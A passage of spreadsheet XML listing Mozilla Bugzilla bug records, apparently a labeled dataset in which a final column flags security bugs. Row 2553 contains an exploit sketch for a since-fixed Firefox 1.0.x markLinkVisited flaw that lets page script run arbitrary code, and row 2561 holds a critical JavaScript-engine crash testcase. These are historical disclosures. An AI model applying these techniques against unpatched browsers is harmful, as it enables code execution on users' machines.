      <c r="W2552" t="inlineStr">
        <is>
          <t>Created attachment 586784
Add NSPR and NSS items to the skiplist
+++ This bug was initially created as a clone of Bug #630230 +++
Please add the following items to prefixSignatureRegEx:
+  'PL_.*',
+  'PR_.*',
+  '_PR_.*',
+  'LL_.*',
+  '_MD_.*',
+  'PORT_.*',
+  'port_.*',
+  'SEC_.*Item',
+  'SECKEY_.*',
+  'seckey_.*',
+  'CERT_.*',
+  'cert_.*',
+  'SSL_.*',
+  'ssl_.*',
+  'ssl3_.*',
+  'SocketClose',
+  'SocketRead',
+  'SocketWrite',
+  'SocketAvailable',
+  'SocketAvailable64',
+  'SocketSync',
+  'SocketWritev',
+  'SocketConnect',
+  'SocketAccept',
+  'SocketBind',
+  'SocketListen',
+  'SocketShutdown',
+  'SocketRecv',
+  'SocketSend',
+  'SocketPoll',
+  'SocketAcceptRead',
+  'SocketTransmitFile',
+  'SocketGetName',
+  'SocketGetPeerName',
NSPR and NSS are very stable at this point, and it is almost definitely the case that the error is in the caller. Too many bug reports are getting generated for generic things like send() and recv() and it is more useful to differentiate specific callers. Also, we need many of the NSS functions added so we can differentiate SSL-related crashes from DOMCrypt-, BrowserID-, plugin-, and extension-, and malware- related crashes.</t>
        </is>
      </c>
      <c r="X2552" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2553">
      <c r="A2553" t="n">
        <v>289074</v>
      </c>
      <c r="B2553" t="inlineStr">
        <is>
          <t>2005-04-05 00:16:54 -0700</t>
        </is>
      </c>
      <c r="C2553" t="inlineStr">
        <is>
          <t>security hole in markLinkVisited (Bug 217195) has not been fixed</t>
        </is>
      </c>
      <c r="D2553" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2553" t="n">
        <v>1</v>
      </c>
      <c r="F2553" t="n">
        <v>1</v>
      </c>
      <c r="G2553" t="n">
        <v>3</v>
      </c>
      <c r="H2553" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2553" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2553" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2553" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2553" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2553" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2553" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2553" t="inlineStr">
        <is>
          <t>[sg:fix] need trunk answers from brendan/jst (Monday)</t>
        </is>
      </c>
      <c r="Q2553" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2553" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2553" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T2553" t="n">
        <v>1</v>
      </c>
      <c r="U2553" t="n">
        <v>0</v>
      </c>
      <c r="V2553" t="n">
        <v>101</v>
      </c>
      <c r="W2553" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
See Bug 217195, its fix is not sufficient.
Vulnerable code:
from markLinkVisited in contentAreaUtils.js
var oldHref = linkNode.getAttribute("href");
linkNode.setAttribute("href", "");
linkNode.setAttribute("href", oldHref);
Exploit:
It is possible to execute the second argument, such as the following.
  eval.setAttribute = eval.call;
  eval.setAttribute("href", code);
|eval| can work with XPCNativeWrapper, such as the following.
(|new XPCNativeWrapper(eval, "href").href| works as
|new XPCNativeWrapper(linkNode, "href").href|.)
  linkNode = document.links[0];
  eval.__proto__ = linkNode;
It is possible to pass |eval| as linkNode, such as the following.
  &lt;a href="#"&gt;&lt;span&gt;test&lt;/span&gt;&lt;/a&gt;
  document.links[0].firstChild
  .__defineGetter__('parentNode', function() { return eval; });
I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X2553" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2554">
      <c r="A2554" t="n">
        <v>1441766</v>
      </c>
      <c r="B2554" t="inlineStr">
        <is>
          <t>2018-02-28 00:11:09 -0800</t>
        </is>
      </c>
      <c r="C2554" t="inlineStr">
        <is>
          <t>Cookies and site data search keywords aren't optimal</t>
        </is>
      </c>
      <c r="D2554" t="inlineStr">
        <is>
          <t>2018-03-01 10:48:04 -0800</t>
        </is>
      </c>
      <c r="E2554" t="n">
        <v>1</v>
      </c>
      <c r="F2554" t="n">
        <v>1</v>
      </c>
      <c r="G2554" t="n">
        <v>2</v>
      </c>
      <c r="H2554" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2554" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2554" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K2554" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L2554" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2554" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2554" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2554" t="inlineStr">
        <is>
          <t>[storage-v2]</t>
        </is>
      </c>
      <c r="Q2554" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2554" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2554" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T2554" t="n">
        <v>1</v>
      </c>
      <c r="U2554" t="n">
        <v>0</v>
      </c>
      <c r="V2554" t="n">
        <v>10</v>
      </c>
      <c r="W2554" t="inlineStr">
        <is>
          <t>If you search for e.g. "third party" it will still direct you to the History menu. There are some other search strings that aren't well adjusted either.</t>
        </is>
      </c>
      <c r="X2554" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2555">
      <c r="A2555" t="n">
        <v>1309672</v>
      </c>
      <c r="B2555" t="inlineStr">
        <is>
          <t>2016-10-12 11:59:36 -0700</t>
        </is>
      </c>
      <c r="C2555" t="inlineStr">
        <is>
          <t>Clear user data between sessions</t>
        </is>
      </c>
      <c r="D2555" t="inlineStr">
        <is>
          <t>2016-10-25 16:11:33 -0700</t>
        </is>
      </c>
      <c r="E2555" t="n">
        <v>1</v>
      </c>
      <c r="F2555" t="n">
        <v>1</v>
      </c>
      <c r="G2555" t="n">
        <v>2</v>
      </c>
      <c r="H2555" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2555" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J2555" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2555" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2555" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2555" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2555" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q2555" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2555" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2555" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2555" t="n">
        <v>1</v>
      </c>
      <c r="U2555" t="n">
        <v>0</v>
      </c>
      <c r="V2555" t="n">
        <v>3</v>
      </c>
      <c r="W2555" t="inlineStr">
        <is>
          <t>Focus is a privacy-focused browser, so we should not keep any user data around.</t>
        </is>
      </c>
      <c r="X2555" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2556">
      <c r="A2556" t="n">
        <v>313695</v>
      </c>
      <c r="B2556" t="inlineStr">
        <is>
          <t>2005-10-24 20:46:48 -0700</t>
        </is>
      </c>
      <c r="C2556" t="inlineStr">
        <is>
          <t>Buglist does not use shadowdb</t>
        </is>
      </c>
      <c r="D2556" t="inlineStr">
        <is>
          <t>2006-12-29 21:25:21 -0800</t>
        </is>
      </c>
      <c r="E2556" t="n">
        <v>1</v>
      </c>
      <c r="F2556" t="n">
        <v>1</v>
      </c>
      <c r="G2556" t="n">
        <v>4</v>
      </c>
      <c r="H2556" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2556" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2556" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K2556" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L2556" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2556" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2556" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2556" t="inlineStr"/>
      <c r="Q2556" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2556" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2556" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T2556" t="n">
        <v>1</v>
      </c>
      <c r="U2556" t="n">
        <v>0</v>
      </c>
      <c r="V2556" t="n">
        <v>18</v>
      </c>
      <c r="W2556" t="inlineStr">
        <is>
          <t>at the beginning, $dbh is set to Bugzilla-&gt;dbh
later, switch_to_shadow() changes what will be returned by Bugzilla-&gt;dbh
then, it does $dbh-&gt;prepare which gets the value it had before it switched to shadow.
buglist needs to get a handle for main and one for shadow and use the appropriate ones for the appropriate purposes.</t>
        </is>
      </c>
      <c r="X2556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2557">
      <c r="A2557" t="n">
        <v>1391209</v>
      </c>
      <c r="B2557" t="inlineStr">
        <is>
          <t>2017-08-17 03:22:23 -0700</t>
        </is>
      </c>
      <c r="C2557" t="inlineStr">
        <is>
          <t>Selected tab accent highlight is cut off by window border in Normal and Touch densities in non-maximized windows</t>
        </is>
      </c>
      <c r="D2557" t="inlineStr">
        <is>
          <t>2017-10-18 02:42:14 -0700</t>
        </is>
      </c>
      <c r="E2557" t="n">
        <v>1</v>
      </c>
      <c r="F2557" t="n">
        <v>1</v>
      </c>
      <c r="G2557" t="n">
        <v>2</v>
      </c>
      <c r="H2557" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2557" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2557" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2557" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L2557" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2557" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N2557" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2557" t="inlineStr">
        <is>
          <t>[reserve-photon-visual] fixed by bug 1366405</t>
        </is>
      </c>
      <c r="Q2557" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2557" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2557" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T2557" t="n">
        <v>1</v>
      </c>
      <c r="U2557" t="n">
        <v>0</v>
      </c>
      <c r="V2557" t="n">
        <v>20</v>
      </c>
      <c r="W2557" t="inlineStr">
        <is>
          <t>Created attachment 8898236
thin-tab-accent.png
Bug 1375335 has made the selected tab accent too thin on Windows 10 for non-maximized windows using Normal and Touch densities.</t>
        </is>
      </c>
      <c r="X2557" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2558">
      <c r="A2558" t="n">
        <v>106764</v>
      </c>
      <c r="B2558" t="inlineStr">
        <is>
          <t>2001-10-25 12:43:06 -0700</t>
        </is>
      </c>
      <c r="C2558" t="inlineStr">
        <is>
          <t>Can't delete cert with S/MIME experimental build</t>
        </is>
      </c>
      <c r="D2558" t="inlineStr">
        <is>
          <t>2009-05-04 22:40:25 -0700</t>
        </is>
      </c>
      <c r="E2558" t="n">
        <v>1</v>
      </c>
      <c r="F2558" t="n">
        <v>1</v>
      </c>
      <c r="G2558" t="n">
        <v>3</v>
      </c>
      <c r="H2558" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2558" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2558" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K2558" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L2558" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2558" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2558" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2558" t="inlineStr"/>
      <c r="Q2558" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2558" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2558" t="inlineStr">
        <is>
          <t>psm2.2</t>
        </is>
      </c>
      <c r="T2558" t="n">
        <v>1</v>
      </c>
      <c r="U2558" t="n">
        <v>0</v>
      </c>
      <c r="V2558" t="n">
        <v>8</v>
      </c>
      <c r="W2558" t="inlineStr">
        <is>
          <t>Build: 2001-10-24-14-OTIS commercial build.
The delete button in the Certificate Manager window doesn't seem to work at all.
Select either an user's cert or other person's cert, then click "delete", and 
nothing happen.</t>
        </is>
      </c>
      <c r="X2558" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2559">
      <c r="A2559" t="n">
        <v>725167</v>
      </c>
      <c r="B2559" t="inlineStr">
        <is>
          <t>2012-02-07 16:57:56 -0800</t>
        </is>
      </c>
      <c r="C2559" t="inlineStr">
        <is>
          <t>java.lang.IllegalArgumentException: Given view not a child of android.widget.AbsoluteLayout@4... at android.view.ViewGroup.updateViewLayout(ViewGroup.java)</t>
        </is>
      </c>
      <c r="D2559" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E2559" t="n">
        <v>1</v>
      </c>
      <c r="F2559" t="n">
        <v>1</v>
      </c>
      <c r="G2559" t="n">
        <v>6</v>
      </c>
      <c r="H2559" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2559" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2559" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2559" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2559" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2559" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2559" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2559" t="inlineStr">
        <is>
          <t>[native-crash]</t>
        </is>
      </c>
      <c r="Q2559" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2559" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2559" t="inlineStr">
        <is>
          <t>Firefox 14</t>
        </is>
      </c>
      <c r="T2559" t="n">
        <v>1</v>
      </c>
      <c r="U2559" t="n">
        <v>0</v>
      </c>
      <c r="V2559" t="n">
        <v>25</v>
      </c>
      <c r="W2559" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-2b1d53e7-d0ea-4e82-a21b-3e6662120202 .
============================================================= 
Someone with stack access please post it in this bug.</t>
        </is>
      </c>
      <c r="X2559" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2560">
      <c r="A2560" t="n">
        <v>728388</v>
      </c>
      <c r="B2560" t="inlineStr">
        <is>
          <t>2012-02-17 13:17:17 -0800</t>
        </is>
      </c>
      <c r="C2560" t="inlineStr">
        <is>
          <t>Make Fx11 the default selection</t>
        </is>
      </c>
      <c r="D2560" t="inlineStr">
        <is>
          <t>2012-02-29 10:56:46 -0800</t>
        </is>
      </c>
      <c r="E2560" t="n">
        <v>1</v>
      </c>
      <c r="F2560" t="n">
        <v>1</v>
      </c>
      <c r="G2560" t="n">
        <v>5</v>
      </c>
      <c r="H2560" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2560" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2560" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2560" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2560" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2560" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2560" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2560" t="inlineStr">
        <is>
          <t>u=user c=wiki s=2012.5 p=1</t>
        </is>
      </c>
      <c r="Q2560" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2560" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2560" t="inlineStr">
        <is>
          <t>2012-03-13</t>
        </is>
      </c>
      <c r="T2560" t="n">
        <v>1</v>
      </c>
      <c r="U2560" t="n">
        <v>0</v>
      </c>
      <c r="V2560" t="n">
        <v>2</v>
      </c>
      <c r="W2560" t="inlineStr">
        <is>
          <t>This needs to land in 2012-03-13.</t>
        </is>
      </c>
      <c r="X2560" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2561">
      <c r="A2561" t="n">
        <v>528644</v>
      </c>
      <c r="B2561" t="inlineStr">
        <is>
          <t>2009-11-13 15:59:06 -0800</t>
        </is>
      </c>
      <c r="C2561" t="inlineStr">
        <is>
          <t>Crash [@ js_GetUpvar]</t>
        </is>
      </c>
      <c r="D2561" t="inlineStr">
        <is>
          <t>2012-03-23 16:55:45 -0700</t>
        </is>
      </c>
      <c r="E2561" t="n">
        <v>1</v>
      </c>
      <c r="F2561" t="n">
        <v>1</v>
      </c>
      <c r="G2561" t="n">
        <v>3</v>
      </c>
      <c r="H2561" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2561" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2561" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2561" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2561" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2561" t="inlineStr">
        <is>
          <t>[sg:critical][ccbr][3.6.x]fixed-in-tracemonkey [rc-ridealong]</t>
        </is>
      </c>
      <c r="Q2561" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2561" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2561" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2561" t="n">
        <v>1</v>
      </c>
      <c r="U2561" t="n">
        <v>0</v>
      </c>
      <c r="V2561" t="n">
        <v>17</v>
      </c>
      <c r="W2561" t="inlineStr">
        <is>
          <t>function g(foo) {
  for (a in foo) function() {}
}
(g((eval("\
  function() {\
    for each(b in [0]) {\
      __defineGetter__(\"x\", \
        function(b) \
        eval(\"new function() { yield print(b) }\" ) \
      )\
    } \
    return x\
  }\
"))()))()
crashes js debug and opt shell at js_GetUpvar near null on TM tip on 10.5.8.
autoBisect shows this is probably related to bug 488034:
The first bad revision is:
changeset:   27186:70111870bcf8
user:        Brendan Eich
date:        Mon Apr 13 14:16:15 2009 -0700
summary:     Bug 488034 - Crash [@ js_GetUpvar] or "Assertion failure: (script)-&gt;upvarsOffset != 0, at ../jsinterp.cpp" (r=mrbkap).
Debug stack:
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000018
Crashed Thread:  0
Thread 0 Crashed:
0   js-dbg-tm-darwin              	0x00098a46 js_GetUpvar + 76
1   js-dbg-tm-darwin              	0x0008d56c js_Interpret + 111234
2   js-dbg-tm-darwin              	0x0009e9ab __ZL15SendToGeneratorP9JSContext13JSGeneratorOpP8JSObjectP11JSGeneratorl + 561
3   js-dbg-tm-darwin              	0x0009ede8 __ZL12generator_opP9JSContext13JSGeneratorOpPlj + 610
4   js-dbg-tm-darwin              	0x0009ee91 __ZL14generator_nextP9JSContextjPl + 39
5   js-dbg-tm-darwin              	0x0009c1bb js_Invoke + 1503
6   js-dbg-tm-darwin              	0x0009cbb3 js_InternalInvoke + 151
7   js-dbg-tm-darwin              	0x0009fa60 js_CallIteratorNext + 360
8   js-dbg-tm-darwin              	0x000773a2 js_Interpret + 20664
9   js-dbg-tm-darwin              	0x0009b81b js_Execute + 1169
10  js-dbg-tm-darwin              	0x000111ba JS_ExecuteScript + 54
11  js-dbg-tm-darwin              	0x00009e5e __ZL7ProcessP9JSContextP8JSObjectPci + 458
12  js-dbg-tm-darwin              	0x0000aba0 __ZL11ProcessArgsP9JSContextP8JSObjectPPci + 2272
13  js-dbg-tm-darwin              	0x0000af6d main + 953
14  js-dbg-tm-darwin              	0x00001d6b _start + 209
15  js-dbg-tm-darwin              	0x00001c99 start + 41</t>
        </is>
      </c>
      <c r="X2561" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2562">
      <c r="A2562" t="n">
        <v>492066</v>
      </c>
      <c r="B2562" t="inlineStr">
        <is>
          <t>2009-05-08 11:05:43 -0700</t>
        </is>
      </c>
      <c r="C2562" t="inlineStr">
        <is>
          <t>[qmo2] Preview while editing projects is not visible</t>
        </is>
      </c>
      <c r="D2562" t="inlineStr">
        <is>
          <t>2010-05-28 10:25:56 -0700</t>
        </is>
      </c>
      <c r="E2562" t="n">
        <v>1</v>
      </c>
      <c r="F2562" t="n">
        <v>1</v>
      </c>
      <c r="G2562" t="n">
        <v>5</v>
      </c>
      <c r="H2562" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2562" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J2562" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K2562" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2562" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2562" t="inlineStr"/>
      <c r="Q2562" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2562" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2562" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2562" t="n">
        <v>1</v>
      </c>
      <c r="U2562" t="n">
        <v>0</v>
      </c>
      <c r="V2562" t="n">
        <v>6</v>
      </c>
      <c r="W2562" t="inlineStr">
        <is>
          <t>While editing a project the preview is not visible. The only paragraph you can see it the summary. That should be changed so each edited text is displayed and can be verified before the change is saved.</t>
        </is>
      </c>
      <c r="X2562" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2563">
      <c r="A2563" t="n">
        <v>1756957</v>
      </c>
      <c r="B2563" t="inlineStr">
        <is>
          <t>2022-02-24 01:53:00 -0800</t>
        </is>
      </c>
      <c r="C2563" t="inlineStr">
        <is>
          <t>Incorrect AliasSet for MLoadTypedArrayElementHole</t>
        </is>
      </c>
      <c r="D2563" t="inlineStr">
        <is>
          <t>2022-11-01 08:44:47 -0700</t>
        </is>
      </c>
      <c r="E2563" t="n">
        <v>1</v>
      </c>
      <c r="F2563" t="n">
        <v>1</v>
      </c>
      <c r="G2563" t="n">
        <v>3</v>
      </c>
      <c r="H2563" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2563" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2563" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2563" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2563" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2563" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2563" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main99+][adv-esr91.8+]</t>
        </is>
      </c>
      <c r="Q2563" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2563" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S2563" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T2563" t="n">
        <v>1</v>
      </c>
      <c r="U2563" t="n">
        <v>0</v>
      </c>
      <c r="V2563" t="n">
        <v>13</v>
      </c>
      <c r="W2563" t="inlineStr">
        <is>
          <t>Steps to reproduce:
The AliasSet of MLoadTypedArrayElementHole is currently set to  AliasSet::Load(AliasSet::UnboxedElement). When lowered to either LLoadTypedArrayElementHole or LLoadTypedArrayElementHoleBigInt and eventually codegened, there is a masm.loadArrayBufferViewLengthIntPtr(...). Therefore, AliasSet::ArrayBufferViewLengthOrOffset should be added to the AliasSet. Furthermore, there is an access to ArrayBufferViewObject::dataOffset(). Therefore, AliasSet::ObjectFields should be added as well.</t>
        </is>
      </c>
      <c r="X2563" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2564">
      <c r="A2564" t="n">
        <v>874644</v>
      </c>
      <c r="B2564" t="inlineStr">
        <is>
          <t>2013-05-21 14:51:57 -0700</t>
        </is>
      </c>
      <c r="C2564" t="inlineStr">
        <is>
          <t>Search API on ES parity</t>
        </is>
      </c>
      <c r="D2564" t="inlineStr">
        <is>
          <t>2013-05-30 09:49:22 -0700</t>
        </is>
      </c>
      <c r="E2564" t="n">
        <v>1</v>
      </c>
      <c r="F2564" t="n">
        <v>1</v>
      </c>
      <c r="G2564" t="n">
        <v>6</v>
      </c>
      <c r="H2564" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2564" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2564" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2564" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2564" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2564" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2564" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2564" t="inlineStr"/>
      <c r="Q2564" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2564" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2564" t="inlineStr">
        <is>
          <t>2013-05-30</t>
        </is>
      </c>
      <c r="T2564" t="n">
        <v>1</v>
      </c>
